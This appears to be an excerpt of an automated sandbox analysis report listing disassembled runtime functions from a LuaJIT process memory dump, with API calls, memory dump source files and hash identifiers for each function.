                                                      • Opcode Fuzzy Hash: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                      • Instruction Fuzzy Hash: 0AF0B772A08A8482D720EB45F44431AFBA4F7E6789F904525EBCC43B6CCFBDC5958B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E3ADA0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                      • Instruction ID: 5364bc88887d464e1744eea6e995ebecc671e1430f217f7aee5cb6aa06168cf0
                                                      • Opcode Fuzzy Hash: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                      • Instruction Fuzzy Hash: 58D0C931B18F80C1D744EB16F88510AB7A4FBD5785F908425EAC942A28DF3CC1A98F40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00007FF7B1ECA03C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7B1EBA9A0: GetLastError.KERNEL32(?,?,?,00007FF7B1EBCEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3), ref: 00007FF7B1EBA9AF
                                                        • Part of subcall function 00007FF7B1EBA9A0: SetLastError.KERNEL32(?,?,?,00007FF7B1EBCEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3), ref: 00007FF7B1EBAA4D
                                                      • TranslateName.LIBCMT ref: 00007FF7B1ECA0A9
                                                      • TranslateName.LIBCMT ref: 00007FF7B1ECA0E4
                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF7B1EB717C), ref: 00007FF7B1ECA129
                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF7B1EB717C), ref: 00007FF7B1ECA151
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                      • String ID: utf8
                                                      • API String ID: 2136749100-905460609
                                                      • Opcode ID: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction ID: cde835adf85150f92b4fb667d0e1a0d415f69cb3429d23528dbc5481e1dfcbe3
                                                      • Opcode Fuzzy Hash: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction Fuzzy Hash: D291C432A0875281EB24BF69D8402BDA395EBE6B89F844131DB5D4778DEFBDE541C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1ECAA70 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                      • String ID:
                                                      • API String ID: 3939093798-0
                                                      • Opcode ID: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction ID: 0f5973098350d1a1e337ca875a917969f1a954038280c4177840d9629f9e70f9
                                                      • Opcode Fuzzy Hash: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction Fuzzy Hash: B1718F32F086028AFB14AB68D8506FDA3A1BFA674DF844535CF0D53689EFBCA444D360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E8D9D4 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      • Opcode ID: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction ID: 49e2599125419568d82dc875b237032dc309817cedbfc0b257fdff65056c9fcd
                                                      • Opcode Fuzzy Hash: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction Fuzzy Hash: 75316E72708BC186EB60AF64E8403EDB361FB95749F84443ADB4E47A98DF78C548C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC29E0 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 435049134-0
                                                      • Opcode ID: f9bb82080360fa38c87216f357e5cc06e720d9d5a5b86dd3aaa06d23e79570f7
                                                      • Instruction ID: 615f732f2aa0c8d6dfeea40afa4482010224e3bf8543df42173b1fb74fc3f542
                                                      • Opcode Fuzzy Hash: f9bb82080360fa38c87216f357e5cc06e720d9d5a5b86dd3aaa06d23e79570f7
                                                      • Instruction Fuzzy Hash: 9EB1A226E0824345F710FF2D98815BAA760BBA6B89FC44135EF4D47A99DFBCE441C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB4828 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1405656091-0
                                                      • Opcode ID: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                      • Instruction ID: 7b1fc6f0cc8cf27db255ba87ae97667b03ec80e551f1e9d07a22027c4c288b93
                                                      • Opcode Fuzzy Hash: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                      • Instruction Fuzzy Hash: 6391C5B2B0424747EB58DF2DC981279A295EB6578DF848139EB0E4A78DEE7CE441C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB8900 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                      • Instruction ID: 45bf8df7b5f4db2bd3f2e938286542cf88b1cded1c072ea138413a71e42a7e75
                                                      • Opcode Fuzzy Hash: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                      • Instruction Fuzzy Hash: F9319432608B8186DB60EF29E8447AEB3A4FB99799F940135EB8D43B58DF7CC145CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E6AD60 Relevance: 7.8, APIs: 5, Instructions: 347COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID:
                                                      • API String ID: 3764944385-0
                                                      • Opcode ID: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                      • Instruction ID: 57cbe4376ebe9f607d6ec764c9529120a46cc2dab3ba837bf137d4dd91206bc0
                                                      • Opcode Fuzzy Hash: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                      • Instruction Fuzzy Hash: 7802C032A186458BD770DB1DE48062EB7E0F799749F904225FA9EC7B98DA7CE940CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBC47C Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                      • String ID:
                                                      • API String ID: 1443284424-0
                                                      • Opcode ID: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                      • Instruction ID: 40c8ecef8281d185e37b5e49901ec78e2862d035399c168c6f25b9eb2e3650a8
                                                      • Opcode Fuzzy Hash: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                      • Instruction Fuzzy Hash: 1AE1F232B1C6819AE700DB68D0801AEBBB1FB5679DB844232EF4E57B9CDE78D516C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC2C74 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _get_daylight.LIBCMT ref: 00007FF7B1EC2CA2
                                                        • Part of subcall function 00007FF7B1EC23E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EC23F4
                                                      • _get_daylight.LIBCMT ref: 00007FF7B1EC2CB3
                                                        • Part of subcall function 00007FF7B1EC2380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EC2394
                                                      • _get_daylight.LIBCMT ref: 00007FF7B1EC2CC4
                                                        • Part of subcall function 00007FF7B1EC23B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EC23C4
                                                        • Part of subcall function 00007FF7B1EB9294: HeapFree.KERNEL32(?,?,?,00007FF7B1EC8C78,?,?,?,00007FF7B1EC8FFB,?,?,00000019,00007FF7B1EC96D0,?,?,?,00007FF7B1EC9603), ref: 00007FF7B1EB92AA
                                                        • Part of subcall function 00007FF7B1EB9294: GetLastError.KERNEL32(?,?,?,00007FF7B1EC8C78,?,?,?,00007FF7B1EC8FFB,?,?,00000019,00007FF7B1EC96D0,?,?,?,00007FF7B1EC9603), ref: 00007FF7B1EB92BC
                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B1EC2ED0), ref: 00007FF7B1EC2CEB
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 3458911817-0
                                                      • Opcode ID: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                      • Instruction ID: 5d87874bace1c501b749dba3ec72d116ddd88d2a447910a90eaf79b9cb31c2b0
                                                      • Opcode Fuzzy Hash: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                      • Instruction Fuzzy Hash: 3E615F32A0864386E710FF2DE8815A9E760FB6A789FC45135EB4D47A99DFBCE440C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EC28FC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                      • String ID: ?
                                                      • API String ID: 1286766494-1684325040
                                                      • Opcode ID: 2c7f8f1d2cf675da5ae5473346d47931a08e1ba11d2448201601eda58c2183d2
                                                      • Instruction ID: cb9685a52aa00f747fa1830bfad31c32ceb1a812dab3b64dcdc7df9f726d6cc5
                                                      • Opcode Fuzzy Hash: 2c7f8f1d2cf675da5ae5473346d47931a08e1ba11d2448201601eda58c2183d2
                                                      • Instruction Fuzzy Hash: 7D91D426E0825345EB24BF2DC8402BAA751EBA2BD9F944131EF4D07ADDDEBCD442C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB9934 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: InfoLocaletry_get_function
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2200034068-2904428671
                                                      • Opcode ID: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                      • Instruction ID: 742f3cebeefded1c15a187995e6def933079541bcfcd4573da6298dc4ad3b907
                                                      • Opcode Fuzzy Hash: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                      • Instruction Fuzzy Hash: AD01DB61B08B4281E700EB59B4404AAE2A0FFABBC9F9C4135EF4C1375DCE7CD5018750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB9D50 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9D6B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9D8A
                                                        • Part of subcall function 00007FF7B1EB9378: GetProcAddress.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB94D0
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9DA9
                                                        • Part of subcall function 00007FF7B1EB9378: LoadLibraryW.KERNELBASE(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB941B
                                                        • Part of subcall function 00007FF7B1EB9378: GetLastError.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB9429
                                                        • Part of subcall function 00007FF7B1EB9378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB946B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9DC8
                                                        • Part of subcall function 00007FF7B1EB9378: FreeLibrary.KERNEL32(?,?,00000002,00007FF7B1EB9856,?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01), ref: 00007FF7B1EB94A4
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9DE7
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E06
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E25
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E44
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E63
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9E82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                      • API String ID: 3255926029-3252031757
                                                      • Opcode ID: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                      • Instruction ID: 595905cdee44428af15fb6f70e2e84c6b27bda636ca5852a26169ba6982d95a7
                                                      • Opcode Fuzzy Hash: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                      • Instruction Fuzzy Hash: FE31A0A0908A47A0F700FBA8E8905E59361AF2679EFC4163BD30D171BD9EFCA549C360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E28590 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
